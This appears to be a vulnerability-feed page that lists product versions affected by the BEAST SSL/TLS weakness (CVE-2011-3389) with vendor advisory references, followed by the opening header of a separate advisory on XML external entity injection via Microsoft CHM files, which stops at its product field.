HP NonStop Server H06.19.01
HP NonStop Server H06.19.00
HP NonStop Server H06.18.02
HP NonStop Server H06.18.01
HP NonStop Server H06.18.00
HP NonStop Server H06.17.03
HP NonStop Server H06.17.02
HP NonStop Server H06.17.01
HP NonStop Server H06.17.00
HP NonStop Server H06.16.02
HP NonStop Server H06.16.01
HP NonStop Server H06.16.00
HP NonStop Server H06.15.02
HP NonStop Server H06.15.01
HP NonStop Server H06.15.00
HP Network Node Manager i 9.1
HP HP-UX B.11.31
HP HP-UX B.11.11
Hitachi Web Server - Security Enhancement 0
Hitachi uCosminexus Service Platform - Messaging 0
Hitachi uCosminexus Service Platform 09-50 (Windows)
Hitachi uCosminexus Service Platform 09-50 (Windows(x64))
Hitachi uCosminexus Service Platform 09-50 (Linux)
Hitachi uCosminexus Service Platform 09-50 (HP-UX(IPF))
Hitachi uCosminexus Service Platform 09-50 (AIX)
Hitachi uCosminexus Service Platform 09-00 Windows (x64)
Hitachi uCosminexus Service Platform 09-00 Linux (x64)
Hitachi uCosminexus Service Platform 09-00 HP-UX (IPF)
Hitachi uCosminexus Service Platform 09-00 AIX (64)
Hitachi uCosminexus Service Platform 09-00 (Windows)
Hitachi uCosminexus Service Platform 0
Hitachi uCosminexus Service Architect 09-50 (Windows)
Hitachi uCosminexus Service Architect 09-50 (Windows(x64))
Hitachi uCosminexus Service Architect 09-50 (Linux)
Hitachi uCosminexus Service Architect 09-50 (HP-UX(IPF))
Hitachi uCosminexus Service Architect 09-50 (AIX)
Hitachi uCosminexus Service Architect 09-00 (Windows)
Hitachi uCosminexus Service Architect 09-00 (Windows(x64))
Hitachi uCosminexus Service Architect 09-00 (Linux)
Hitachi uCosminexus Service Architect 09-00 (HP-UX(IPF))
Hitachi uCosminexus Service Architect 09-00 (AIX)
Hitachi uCosminexus Service Architect 0
Hitachi uCosminexus Primary Server Base 09-50 (Windows)
Hitachi uCosminexus Primary Server Base 09-50 (Windows(x64))
Hitachi uCosminexus Primary Server Base 09-50 (Linux)
Hitachi uCosminexus Primary Server Base 09-50 (HP-UX(IPF))
Hitachi uCosminexus Primary Server Base 09-50 (AIX)
Hitachi uCosminexus Primary Server Base 09-00 (Windows)
Hitachi uCosminexus Primary Server Base 09-00 (Windows(x64))
Hitachi uCosminexus Primary Server Base 09-00 (Linux)
Hitachi uCosminexus Primary Server Base 09-00 (HP-UX(IPF))
Hitachi uCosminexus Primary Server Base 09-00 (AIX)
Hitachi uCosminexus Primary Server Base 0
Hitachi uCosminexus Operator for Service Platform 09-50 (Windows)
Hitachi uCosminexus Operator for Service Platform 09-50 (Windows(x64))
Hitachi uCosminexus Operator for Service Platform 09-50 (Linux)
Hitachi uCosminexus Operator for Service Platform 09-50 (HP-UX(IPF))
Hitachi uCosminexus Operator for Service Platform 09-50 (AIX)
Hitachi uCosminexus Operator for Service Platform 09-00 (Windows)
Hitachi uCosminexus Operator for Service Platform 09-00 (Windows(x64))
Hitachi uCosminexus Operator for Service Platform 09-00 (Linux)
Hitachi uCosminexus Operator for Service Platform 09-00 (HP-UX(IPF))
Hitachi uCosminexus Operator for Service Platform 09-00 (AIX)
Hitachi uCosminexus Operator 0
Hitachi uCosminexus Developer Standard 0
Hitachi uCosminexus Developer Professional for Plug-in 0
Hitachi uCosminexus Developer Professional 0
Hitachi uCosminexus Developer Light 0
Hitachi uCosminexus Developer 01 0
Hitachi uCosminexus Developer 09-50 (Windows)
Hitachi uCosminexus Developer 09-50 (Windows(x64))
Hitachi uCosminexus Developer 09-50 (Linux)
Hitachi uCosminexus Developer 09-50 (HP-UX(IPF))
Hitachi uCosminexus Developer 09-50 (AIX)
Hitachi uCosminexus Developer 09-00 HP-UX(IPF)
Hitachi uCosminexus Developer 09-00 (Windows(x64))
Hitachi uCosminexus Developer 09-00 (Linux)
Hitachi uCosminexus Developer 09-00 (AIX)
Hitachi uCosminexus Developer 09-00
Hitachi uCosminexus Client for Plug-in 0
Hitachi uCosminexus Client 09-50 (Windows)
Hitachi uCosminexus Client 09-50 (Windows(x64))
Hitachi uCosminexus Client 09-50 (Linux)
Hitachi uCosminexus Client 09-50 (HP-UX(IPF))
Hitachi uCosminexus Client 09-50 (AIX)
Hitachi uCosminexus Client 09-00 (Windows)
Hitachi uCosminexus Client 09-00 (Windows(x64))
Hitachi uCosminexus Client 09-00 (Linux)
Hitachi uCosminexus Client 09-00 (HP-UX(IPF))
Hitachi uCosminexus Client 09-00 (AIX)
Hitachi uCosminexus Client 0
Hitachi uCosminexus Application Server-r 09-50 (Windows)
Hitachi uCosminexus Application Server-r 09-50 (Windows(x64))
Hitachi uCosminexus Application Server-r 09-50 (Linux)
Hitachi uCosminexus Application Server-r 09-50 (HP-UX(IPF))
Hitachi uCosminexus Application Server-r 09-50 (AIX)
Hitachi uCosminexus Application Server-r 09-00 (Windows)
Hitachi uCosminexus Application Server-r 09-00 (Windows(x64))
Hitachi uCosminexus Application Server-r 09-00 (Linux)
Hitachi uCosminexus Application Server-r 09-00 (HP-UX(IPF))
Hitachi uCosminexus Application Server-r 09-00 (AIX)
Hitachi uCosminexus Application Server Standard-R 0
Hitachi uCosminexus Application Server Standard 0
Hitachi uCosminexus Application Server Smart Edition 0
Hitachi uCosminexus Application Server Light 0
Hitachi uCosminexus Application Server Express 09-70 (AIX)
Hitachi uCosminexus Application Server Enterprise 09-80 (Windows(x64))
Hitachi uCosminexus Application Server 09-50 (Windows(x64))
Hitachi uCosminexus Application Server 09-50 (Linux)
Hitachi uCosminexus Application Server 09-50 (HP-UX(IPF))
Hitachi uCosminexus Application Server 09-50 (AIX)
Hitachi uCosminexus Application Server 09-00
Hitachi Processing Kit for XML 0
Hitachi Hitachi Web Server 04-10-03 Windows (x64)
Hitachi Hitachi Web Server 04-10-01 Windows (x64)
Hitachi Hitachi Web Server 03-00-06 Windows 0
Hitachi Hitachi Web Server 04-10-03 Windows
Hitachi Hitachi Web Server 04-10-02 HP-UX (IPF)
Hitachi Hitachi Web Server 04-10-01 HP-UX (IPF)
Hitachi Hitachi Web Server 04-10 Windows
Hitachi Hitachi Web Server 04-00-05 Windows
Hitachi Hitachi Web Server 04-00-04 HP-UX (IPF)
Hitachi Hitachi Web Server 04-00-01 Solaris
Hitachi Hitachi Web Server 04-00 Windows
Hitachi Hitachi Web Server 04-00 Linux (IPF)
Hitachi Hitachi Web Server 04-00 Linux
Hitachi Hitachi Web Server 04-00 HP-UX (IPF)
Hitachi Hitachi Web Server 04-00 AIX
Hitachi Hitachi Web Server 03-10-10 Windows
Hitachi Hitachi Web Server 03-10-09 HP-UX (IPF)
Hitachi Hitachi Web Server 03-10 Windows
Hitachi Hitachi Web Server 03-10 HP-UX (IPF)
Hitachi Hitachi Web Server 03-00-05 HP-UX (IPF)
Hitachi Hitachi Web Server 03-00-02 (Windows)
Hitachi Hitachi Web Server 03-00-01 HP-UX
Hitachi Hitachi Web Server 03-00-01 (HP-UX(IPF)
Hitachi Hitachi Web Server 03-00 Windows
Hitachi Hitachi Web Server 03-00 Solaris
Hitachi Hitachi Web Server 03-00 Linux (IPF)
Hitachi Hitachi Web Server 03-00 Linux
Hitachi Hitachi Web Server 03-00 HP-UX (IPF)
Hitachi Hitachi Web Server 03-00 HP-UX
Hitachi Hitachi Web Server 03-00 AIX
Hitachi Hitachi Web Server 02-05 (Linux)
Hitachi Hitachi Web Server 02-04-/C (Windows)
Hitachi Hitachi Web Server 02-04-/B (Windows)
Hitachi Hitachi Web Server 02-04-/B (Linux(IPF)
Hitachi Hitachi Web Server 02-04-/A (Windows)
Hitachi Hitachi Web Server 02-04-/A (Windows(IP
Hitachi Hitachi Web Server 02-04-/A (Solaris)
Hitachi Hitachi Web Server 02-04-/A (Linux IPF)
Hitachi Hitachi Web Server 02-04-/A (HP-UX)
Hitachi Hitachi Web Server 02-04-/A (AIX)
Hitachi Hitachi Web Server 02-04 (Windows)
Hitachi Hitachi Web Server 02-04 (Linux)
Hitachi Hitachi Web Server 02-04 (HP-UX(IPF))
Hitachi Hitachi Web Server 02-03 (Windows)
Hitachi Hitachi Web Server 02-03 (Solaris)
Hitachi Hitachi Web Server 02-03 (Linux)
Hitachi Hitachi Web Server 02-03 (Linux IPF)
Hitachi Hitachi Web Server 02-03 (HP-UX)
Hitachi Hitachi Web Server 02-03 (HP-UX(IPF))
Hitachi Hitachi Web Server 02-03 (AIX)
Hitachi Hitachi Web Server 02-02 (Windows)
Hitachi Hitachi Web Server 02-02 (Solaris)
Hitachi Hitachi Web Server 02-02 (HP-UX)
Hitachi Hitachi Web Server 02-02 (AIX)
Hitachi Hitachi Web Server 02-01 (Windows)
Hitachi Hitachi Web Server 02-01 (Solaris)
Hitachi Hitachi Web Server 02-01 (HP-UX)
Hitachi Hitachi Web Server 02-01 (AIX)
Hitachi Hitachi Web Server 01-02-/D (AIX)
Hitachi Hitachi Web Server 01-02-/C (Solaris)
Hitachi Hitachi Web Server 01-02-/C (HP-UX)
Hitachi Hitachi Web Server 01-02-/C (AIX)
Hitachi Hitachi Web Server 01-02-/B (Solaris)
Hitachi Hitachi Web Server 01-02-/B (HP-UX)
Hitachi Hitachi Web Server 01-02-/B (AIX)
Hitachi Hitachi Web Server 01-02-/A (Solaris)
Hitachi Hitachi Web Server 01-02-/A (HP-UX)
Hitachi Hitachi Web Server 01-02-/A (AIX)
Hitachi Hitachi Web Server 01-02 (Solaris)
Hitachi Hitachi Web Server 01-02 (HP-UX)
Hitachi HiRDB for Java 0
Hitachi Cosminexus Studio - Web Edition 0
Hitachi Cosminexus Studio - Standard Edition 0
Hitachi Cosminexus Studio 0
Hitachi Cosminexus Server Web Edition 0
Hitachi Cosminexus Server Standard Edition 0
Hitachi Cosminexus Primary Server Base 0
Hitachi Cosminexus HTTP Server 09-00-10 Windows(x6)
Hitachi Cosminexus HTTP Server 09-00-10 Windows
Hitachi Cosminexus HTTP Server 09-00-10 Linux(x64)
Hitachi Cosminexus HTTP Server 09-00-10 HP-UX(IPF)
Hitachi Cosminexus HTTP Server 09-00-10 (AIX)
Hitachi Cosminexus HTTP Server 09-00 Windows(x64)
Hitachi Cosminexus HTTP Server 09-00 Windows
Hitachi Cosminexus HTTP Server 09-00 Linux(x64)
Hitachi Cosminexus HTTP Server 09-00 HP-UX(IPF)
Hitachi Cosminexus HTTP Server 09-00 (AIX)
Hitachi Cosminexus Developer Standard 0
Hitachi Cosminexus Developer Professional 0
Hitachi Cosminexus Developer no version 0
Hitachi Cosminexus Developer Light 0
Hitachi Cosminexus Developer 6.0
Hitachi Cosminexus Developer 5
Hitachi Cosminexus Client 0
Hitachi Cosminexus Application Server Standard 0
Hitachi Cosminexus Application Server no version 0
Hitachi Cosminexus Application Server Enterprise 0
Hitachi Cosminexus Application Server 6.0
Hitachi Cosminexus Application Server 5.0
Hitachi Cosminexus 9.0
Hitachi Cosminexus 8.0
Hitachi Cosminexus 7.0
Hitachi Cosminexus 6.0
Google Chrome 9.0.597.94
Google Chrome 9.0.597.84
Google Chrome 9.0.597.107
Google Chrome 8.0.552.344
Google Chrome 8.0.552.310
Google Chrome 8.0.552.309
Google Chrome 8.0.552.308
Google Chrome 8.0.552.307
Google Chrome 8.0.552.306
Google Chrome 8.0.552.305
Google Chrome 8.0.552.304
Google Chrome 8.0.552.303
Google Chrome 8.0.552.302
Google Chrome 8.0.552.301
Google Chrome 8.0.552.300
Google Chrome 8.0.552.237
Google Chrome 8.0.552.226
Google Chrome 8.0.552.225
Google Chrome 8.0.552.224
Google Chrome 8.0.552.223
Google Chrome 8.0.552.222
Google Chrome 8.0.552.221
Google Chrome 8.0.552.220
Google Chrome 8.0.552.219
Google Chrome 8.0.552.218
Google Chrome 8.0.552.217
Google Chrome 8.0.552.216
Google Chrome 8.0.552.215
Google Chrome 8.0.552.214
Google Chrome 8.0.552.213
Google Chrome 8.0.552.212
Google Chrome 8.0.552.211
Google Chrome 8.0.552.210
Google Chrome 8.0.552.21
Google Chrome 8.0.552.209
Google Chrome 8.0.552.208
Google Chrome 8.0.552.207
Google Chrome 8.0.552.206
Google Chrome 8.0.552.205
Google Chrome 8.0.552.204
Google Chrome 8.0.552.203
Google Chrome 8.0.552.202
Google Chrome 8.0.552.201
Google Chrome 8.0.552.200
Google Chrome 8.0.552.20
Google Chrome 8.0.552.2
Google Chrome 8.0.552.19
Google Chrome 8.0.552.18
Google Chrome 8.0.552.17
Google Chrome 8.0.552.16
Google Chrome 8.0.552.15
Google Chrome 8.0.552.14
Google Chrome 8.0.552.13
Google Chrome 8.0.552.12
Google Chrome 8.0.552.11
Google Chrome 8.0.552.105
Google Chrome 8.0.552.104
Google Chrome 8.0.552.103
Google Chrome 8.0.552.102
Google Chrome 8.0.552.101
Google Chrome 8.0.552.100
Google Chrome 8.0.552.10
Google Chrome 8.0.552.1
Google Chrome 8.0.552.0
Google Chrome 8.0.551.1
Google Chrome 8.0.551.0
Google Chrome 8.0.550.0
Google Chrome 8.0.549.0
Google Chrome 14.0.835.186
Google Chrome 14.0.835.163
Google Chrome 14
Google Chrome 13.0.782.215
Google Chrome 13.0.782.112
Google Chrome 13.0.782.107
Google Chrome 13
Google Chrome 12.0.742.91
Google Chrome 12.0.742.112
Google Chrome 12.0.742.100
Google Chrome 12
Google Chrome 11.0.696.77
Google Chrome 11.0.696.71
Google Chrome 11.0.696.68
Google Chrome 11.0.696.65
Google Chrome 11.0.696.57
Google Chrome 11.0.696.43
Google Chrome 11.0.672.2
Google Chrome 11
Google Chrome 10.0.648.205
Google Chrome 10.0.648.205
Google Chrome 10.0.648.204
Google Chrome 10.0.648.133
Google Chrome 10.0.648.128
Google Chrome 10.0.648.127
Google Chrome 10.0.648.127
Google Chrome 10
Gentoo Linux
EMC VPLEX GeoSynchrony 5.2.1
EMC VPLEX GeoSynchrony 5.2 SP1
EMC VPLEX GeoSynchrony 4.0
EMC RSA BSAFE SSL-J 6.0
EMC RSA BSAFE SSL-J 5.1.1
EMC RSA BSAFE SSL-C 2.8.5
EMC RSA BSAFE Micro Edition Suite 4.0.3
EMC RSA BSAFE Micro Edition Suite 4.0.2
EMC RSA BSAFE Micro Edition Suite 3.2.5
EMC RSA BSAFE Micro Edition Suite 3.2.4
EMC RSA BSAFE Micro Edition Suite 4.0
EMC RSA BSAFE Micro Edition Suite 3.2
EMC RSA BSAFE Micro Edition Suite 3.1
Debian Linux 6.0 sparc
Debian Linux 6.0 s/390
Debian Linux 6.0 powerpc
Debian Linux 6.0 mips
Debian Linux 6.0 ia-64
Debian Linux 6.0 ia-32
Debian Linux 6.0 arm
Debian Linux 6.0 amd64
Daniel Stenberg curl 7.20
Daniel Stenberg curl 7.19.6
Daniel Stenberg curl 7.19.5
Daniel Stenberg curl 7.19.4
Daniel Stenberg curl 7.19.3
Daniel Stenberg curl 7.19
Daniel Stenberg curl 7.18.1
Daniel Stenberg curl 7.18
Daniel Stenberg curl 7.17
Daniel Stenberg curl 7.16.4
Daniel Stenberg curl 7.15.5
Daniel Stenberg curl 7.15.3
Daniel Stenberg curl 7.15.2
Daniel Stenberg curl 7.15.1
Daniel Stenberg curl 7.15
Daniel Stenberg curl 7.14.1
Daniel Stenberg curl 7.14
Daniel Stenberg curl 7.13.2
Daniel Stenberg curl 7.13.1
Daniel Stenberg curl 7.13
Daniel Stenberg curl 7.12.3
Daniel Stenberg curl 7.12.2
Daniel Stenberg curl 7.12.1
Daniel Stenberg curl 7.12
Daniel Stenberg curl 7.11.2
Daniel Stenberg curl 7.11.1
Daniel Stenberg curl 7.11
Daniel Stenberg curl 7.10.8
Daniel Stenberg curl 7.10.7
Daniel Stenberg curl 7.10.6
Daniel Stenberg curl 7.2.1
Daniel Stenberg curl 7.2
Daniel Stenberg curl 7.23.1
Daniel Stenberg curl 7.21.7
Daniel Stenberg curl 7.21.6
Daniel Stenberg curl 7.20.2
Daniel Stenberg curl 7.20.1
Daniel Stenberg curl 7.16.3
Collax Collax Groupware Suite 5.5.11
Collax Collax Business Server 5.5.11
Avaya Voice Portal 5.1.2
Avaya Voice Portal 5.1.1
Avaya Voice Portal 5.1 SP1
Avaya Voice Portal 5.1
Avaya Voice Portal 5.1
Avaya Voice Portal 5.0 SP2
Avaya Voice Portal 5.0 SP1
Avaya Voice Portal 5.0
Avaya Voice Portal 4.1 SP2
Avaya Voice Portal 4.1 SP1
Avaya Voice Portal 4.1
Avaya Voice Portal 4.0
Avaya Proactive Contact 4.1.2
Avaya Proactive Contact 4.1.1
Avaya Proactive Contact 5.0
Avaya Proactive Contact 4.2.2
Avaya Proactive Contact 4.2.1
Avaya Proactive Contact 4.2
Avaya Proactive Contact 4.1
Avaya Proactive Contact 4.0.1
Avaya Proactive Contact 4.0
Avaya Messaging Storage Server 5.2.8
Avaya Messaging Storage Server 5.2.2
Avaya Messaging Storage Server 5.2 SP3
Avaya Messaging Storage Server 5.2 SP2
Avaya Messaging Storage Server 5.2 SP1
Avaya Messaging Storage Server 5.2
Avaya Messaging Application Server 5.2
Avaya Messaging Application Server 5
Avaya Messaging Application Server 4
Avaya Message Networking 5.2.1
Avaya Message Networking 5.2.4
Avaya Message Networking 5.2.3
Avaya Message Networking 5.2.2
Avaya Message Networking 5.2 SP1
Avaya Message Networking 5.2
Avaya Meeting Exchange - Webportal 6.0
Avaya Meeting Exchange - Web Conferencing Server 0
Avaya Meeting Exchange - Streaming Server 0
Avaya Meeting Exchange - Recording Server 0
Avaya Meeting Exchange - Client Registration Server 0
Avaya Meeting Exchange 5.0 .0.52
Avaya Meeting Exchange 5.2 SP2
Avaya Meeting Exchange 5.2 SP1
Avaya Meeting Exchange 5.2
Avaya Meeting Exchange 5.1 SP1
Avaya Meeting Exchange 5.1
Avaya Meeting Exchange 5.0 SP2
Avaya Meeting Exchange 5.0 SP1
Avaya Meeting Exchange 5.0
Avaya IR 4.0
Avaya IQ 5.2
Avaya IQ 5.1.1
Avaya IQ 5.1
Avaya IQ 5
Avaya IP Office Application Server 7.0
Avaya IP Office Application Server 6.1
Avaya IP Office Application Server 6.0
Avaya Interactive Response 4.0
Avaya Communication Server 1000 Telephony Manager 4.0
Avaya Communication Server 1000 Telephony Manager 3.0
Avaya CMS Server 16.2
Avaya CMS Server 16.1
Avaya CMS Server 16.0
Avaya CMS Server 15.0 AUX
Avaya CMS Server 15.0
Avaya CallPilot 5.0
Avaya CallPilot 4.0
Avaya Aura System Platform 6.0.2
Avaya Aura System Platform 6.0.1
Avaya Aura System Platform 6.0 SP3
Avaya Aura System Platform 6.0 SP2
Avaya Aura System Platform 6.0
Avaya Aura System Platform 1.0
Avaya Aura System Manager 6.1.3
Avaya Aura System Manager 6.1.2
Avaya Aura System Manager 6.1.1
Avaya Aura System Manager 6.1 SP2
Avaya Aura System Manager 6.1 Sp1
Avaya Aura System Manager 6.1
Avaya Aura SIP Enablement Services 5.2.1
Avaya Aura SIP Enablement Services 5.2
Avaya Aura SIP Enablement Services 5.1
Avaya Aura SIP Enablement Services 5.0
Avaya Aura SIP Enablement Services 4.0
Avaya Aura Session Manager 6.1.3
Avaya Aura Session Manager 6.1.2
Avaya Aura Session Manager 6.1.1
Avaya Aura Session Manager 6.1 SP2
Avaya Aura Session Manager 6.1 Sp1
Avaya Aura Session Manager 6.1
Avaya Aura Session Manager 6.0 SP1
Avaya Aura Session Manager 6.0
Avaya Aura Session Manager 5.2
Avaya Aura Session Manager 1.1
Avaya Aura Presence Services 6.1.1
Avaya Aura Presence Services 6.1
Avaya Aura Presence Services 6.0
Avaya Aura Messaging 6.0.1
Avaya Aura Messaging 6.0
Avaya Aura Experience Portal 6.0
Avaya Aura Conferencing 6.0 Standard
Avaya Aura Conferencing 6.0 Standard
Avaya Aura Communication Manager Utility Services 6.1
Avaya Aura Communication Manager Utility Services 6.0
Avaya Aura Communication Manager 5.2
Avaya Aura Communication Manager 5.1
Avaya Aura Communication Manager 4.0
Avaya Aura Communication Manager 4.0
Avaya Aura Application Server 5300 SIP Core 2.0
Avaya Aura Application Enablement Services 5.2.1
Avaya Aura Application Enablement Services 6.1.1
Avaya Aura Application Enablement Services 6.1
Avaya Aura Application Enablement Services 5.2.3
Avaya Aura Application Enablement Services 5.2.2
Avaya Aura Application Enablement Services 5.2
Apple Xcode 4.3
Apple Mac OS X Server 10.7.5
Apple Mac OS X Server 10.6.6
Apple Mac OS X Server 10.6.5
Apple Mac OS X Server 10.6.4
Apple Mac OS X Server 10.6.3
Apple Mac OS X Server 10.6.2
Apple Mac OS X Server 10.6.1
Apple Mac OS X Server 10.7.3
Apple Mac OS X Server 10.7.2
Apple Mac OS X Server 10.7.1
Apple Mac OS X Server 10.7
Apple Mac OS X Server 10.6.8
Apple Mac OS X Server 10.6.7
Apple Mac OS X Server 10.6
Apple Mac OS X 10.8.5
Apple Mac OS X 10.6.6
Apple Mac OS X 10.6.5
Apple Mac OS X 10.6.5
Apple Mac OS X 10.6.4
Apple Mac OS X 10.6.3
Apple Mac OS X 10.6.2
Apple Mac OS X 10.6.1
Apple Mac OS X 10.7.4
Apple Mac OS X 10.7.3
Apple Mac OS X 10.7.2
Apple Mac OS X 10.7.1
Apple Mac OS X 10.7
Apple Mac OS X 10.6.8
Apple Mac OS X 10.6.7
Apple Mac OS X 10.6
Apple iPod Touch 0
Apple iPhone 0
Apple iPad 0
Apple iOS 4.2.1
Apple iOS 4.0.2
Apple iOS 4.0.1
Apple iOS 4.3.5
Apple iOS 4.3.4
Apple iOS 4.3.3
Apple iOS 4.3.2
Apple iOS 4.3.1
Apple iOS 4.3
Apple iOS 4.2.9
Apple iOS 4.2.8
Apple iOS 4.2.7
Apple iOS 4.2.6
Apple iOS 4.2.5
Apple iOS 4.2.10
Apple iOS 4.2 beta
Apple iOS 4.2
Apple iOS 4.1
Apple iOS 4
Apple Apple TV 4.3
Apple Apple TV 4.2
Apple Apple TV 4.1
Apple Apple TV 4.0
Apple Apple TV 2.1
Apple Apple TV 1.0
VMWare Update Manager 5.0 Update 1
Sun JRE (Windows Production Release) 1.5.0_32
Sun JRE (Solaris Production Release) 1.5.0_32
Sun JRE (Linux Production Release) 1.5.0_32
Sun JDK (Windows Production Release) 1.5.0_32
Sun JDK (Solaris Production Release) 1.5.0_32
Sun JDK (Linux Production Release) 1.5.0_32
Siemens SIMATIC RF68XR 3.2.1
Siemens SIMATIC RF615R 3.2.1
PeerSec Networks MatrixSSL 3.2.2
Oracle JRE (Windows Production Release) 1.6.0_28
Oracle JRE (Solaris Production Release) 1.6.0_28
Oracle JRE (Linux Production Release) 1.6.0_28
Oracle JDK (Windows Production Release) 1.6.0_28
Oracle JDK (Solaris Production Release) 1.6.0_28
Oracle JDK (Linux Production Release) 1.6.0_28
Opera Software Opera Web Browser 11.60
Opera Software Opera Web Browser 11.51
Kerio Kerio Connect 8.1
IBM Security AppScan Standard 8.6
IBM OpenPages GRC Platform 6.2.1
IBM Java SE 7 SR1
IBM Java SE 6 SR10
IBM Java SE 1.4.2 SR13-FP11
IBM Java SDK 6 SR10
IBM Java SDK 1.4.2 SR13 FP11
HP System Management Homepage 7.2.1
Hitachi Cosminexus HTTP Server 09-00-13 HP-UX(IPF)
Hitachi Cosminexus HTTP Server 09-00-13 (AIX)
Hitachi Cosminexus HTTP Server 09-00-12 Windows
Hitachi Cosminexus HTTP Server 09-00-12 Linux(x64)
Hitachi Cosminexus HTTP Server 09-00-11 Windows(x6)
Hitachi Cosminexus Developer's Kit for Java(TM) 09-50-01 (Windows(x8
Hitachi Cosminexus Developer's Kit for Java(TM) 09-50-01 (Windows(x6
Hitachi Cosminexus Developer's Kit for Java(TM) 09-50-01 (Linux(x64)
Hitachi Cosminexus Developer's Kit for Java(TM) 09-00-06 (Windows(x8
Hitachi Cosminexus Developer's Kit for Java(TM) 09-00-06 (Windows(x6
Hitachi Cosminexus Developer's Kit for Java(TM) 09-00-06 (Linux(x64)
EMC VPLEX GeoSynchrony 5.3
EMC RSA BSAFE SSL-J 6.0.1
EMC RSA BSAFE SSL-J 5.1.2
EMC RSA BSAFE SSL-C 2.8.6
EMC RSA BSAFE Micro Edition Suite (MES) 4.0.5
EMC RSA BSAFE Micro Edition Suite 3.2.6
Daniel Stenberg curl 7.24.0
Collax Collax Groupware Suite 5.5.12
Collax Collax Business Server 5.5.12
Apple Xcode 4.4
Apple Mac OS X Server 10.7.4
Apple Mac OS X Server 10.7.3
Apple Mac OS X 10.8.2
Apple Mac OS X 10.7.5
Apple Mac OS X 10.9.2
Apple Mac OS X 10.9
Apple Mac OS X 10.7.4
Apple Mac OS X 10.7.3
Apple iOS 5
Apple Apple TV 4.4
Exploit
An exploit tool called the BEAST (Browser Exploit Against SSL/.TLS) has been developed by Thai Duong and Juliano Rizzo. Please see the references for more information.
References:
- Bug 665814 - (CVE-2011-3389) Rizzo/Duong chosen plaintext attack on SSL/TLS 1.0 (Mozilla)
- Collax Business Server 5.5.12 (Collax)
- Collax Business Server Homepage (Collax)
- Collax Groupware Suite 5.5.12 (Collax)
- Collax Groupware Suite Homepage (Collax)
- Configuring IBM Websphere DataPower appliance to close CVE-2011-3389 (BEAST) SSL (IBM)
- CVE-2011-3389 Chosen-plaintext attack against SSL/TLS in GlassFish (Oracle)
- ESA-2012-032: RSA BSAFE® Micro Edition Suite Security Update for BEAST (Browser (EMC)
- ESA-2012-032: RSA BSAFE® Micro Edition Suite Security Update for BEAST (Browser (EMC)
- ESA-2014-016: EMC VPLEX Multiple Vulnerabilities (EMC)
- Hackers break SSL encryption used by millions of sites (The Register)
- IBM Java Update Oracle February 14 2012 CPU (IBM)
- IBM Lotus Domino remedy for BEAST Secure Socket Layer (SSL) 3.0 exploit recently (IBM)
- Kerio Connect Release History (Kerio)
- MatrixSSL Homepage (MatrixSSL)
- Microsoft releases Security Advisory 2588513 (Microsoft)
- Multiple vulnerabilities in Python (Oracle)
- Novell Access Manager and CVE-2011-3389: Beast Attack Vulnerability (Novell)
- Opera 11.51 Security Advisory (Opera Software)
- Opera 11.60 for Windows changelog (Opera Software)
- Oracle Critical Patch Updates (CPUs) and Synchronized Security Releases (SSRs) (IBM)
- PM60958: GEN APAR: 31-BIT JAVA FOR Z/OS SDK 5 SERVICE REFRESH (SR13 FP1) THE PTF (IBM)
- Security Bulletin: IBM System x and Flex Systems Browser Exploit Against SSL/TLS (IBM)
- SSL 3.0 Protocol Specifications (IETF )
- ssl-tls-info-disclosure (70069) (IBM)
- TLS Protocol Version 1.0 Specifications (IETF)
- Update to version 1.4.2 SR13 FP11 and 6 SR10 (IBM)
- ESA-2012-029: RSA BSAFE(r) SSL-C Multiple Vulnerabilities (Security Alert)
- [security bulletin] HPSBMU02900 rev.3 - HP System Management Homepage (SMH) runn (HP)
- A weakness in the SSL v3.0 and TLS 1.0 specifications can allow eavesdropping at (Opera Software)
- About the security content of Xcode 4.4 (Apple)
- ASA-2011-334 java-1.6.0-openjdk security update (RHSA-2011-1380) (Avaya)
- ASA-2011-335 java-1.6.0-sun security update (RHSA-2011-1384) (avaya)
- ASA-2011-364 Oracle Java Critical Update Combined CVEs (October 2011) (Avaya)
- ASA-2012-018 MS12-006 Vulnerability in SSL/TLS Could Allow Information Disclosur (Avaya)
- curl SSL CBC IV vulnerability (curl)
- ESA-2013-039: RSA BSAFE SSL-J Multiple Vulnerabilities (BugTraq)
- HPSBMU02797 SSRT100867 rev.1 (HP)
- HPSBMU02900 rev.1 - HP System Management Homepage (SMH) running on Linux and Win (HP)
- HPSBNS02920 rev.1 - HP NonStop Servers Multiple Remote Vulnerabilities (HP)
- HPSBUX02760 SSRT100805 rev.1 - HP-UX Running Java, Remote Unauthorized Access, D (HP)
- HS11-024 Multiple vulnerabilities have been found in Cosminexus (Hitachi)
- IBM System x and Flex Systems OpenSSH Vulnerabilities (IBM)
- ICS Advisory (ICSA-19-192-04) (ICS CERT)
- Microsoft Security Advisory (2588513) (Microsoft)
- Microsoft Security Bulletin MS12-006 (Microsoft)
- Multiple vulnerabilities have been found in Cosminexus. (Hitachi)
- Oracle Critical Patch Update Advisory - January 2015 Oracle Advisory (Oracle)
- Oracle Critical Patch Update Advisory - October 2013 (Oracle)
- Oracle Java SE Critical Patch Update Advisory - October 2011 (Oracle)
- Potential Security Vulnerabilities in Oracle Java 5 SDK affecting IBM WebSphere (\IBM)
- Security Bulletin: IBM System x and Flex Systems Browser Exploit Against SSL/TLS (IBM)
- Security Bulletin: Potential Security Vulnerabilities in Oracle Java 5 SDK affec (IBM)
- Security Bulletin: Power System Firmware affected by vulnerability in OpenSSL (C (IBM)
- Security Bulletin: Vulnerabilities in AppScan Enterprise and Policy Tester (IBM)
- Security Bulletin: Vulnerabilities in AppScan Standard (IBM)
- Security Bulletin: Vulnerability in Transport Layer Security Protocol Used in IB (IBM)
- SSA-556833: TLS Vulnerabilities in SIMATIC RF6XXR (Siemens)
- VMSA-2012-0003 VMware VirtualCenter Update and ESX 3.5 patch update JRE (VMware)
- VMSA-2012-0005 VMware vCenter Server, Orchestrator, Update Manager, vShield, vSp (VMware)
- Vulnerability about TLS Protocol in Cosminexus HTTP Server and Hitachi Web Serve (Hitachi)
- Vulnerability Note VU#864643 SSL 3.0 and TLS 1.0 allow chosen plaintext attack i (US-CERT)
- Xerox Security Bulletin XRX13-007 (Xerox)
↧
Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity Injection
Microsoft compiled HTML Help and uncompiled .chm files can be leveraged for XML external entity injection attacks.
58644216083e140438ff9e4523e0bb5b[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
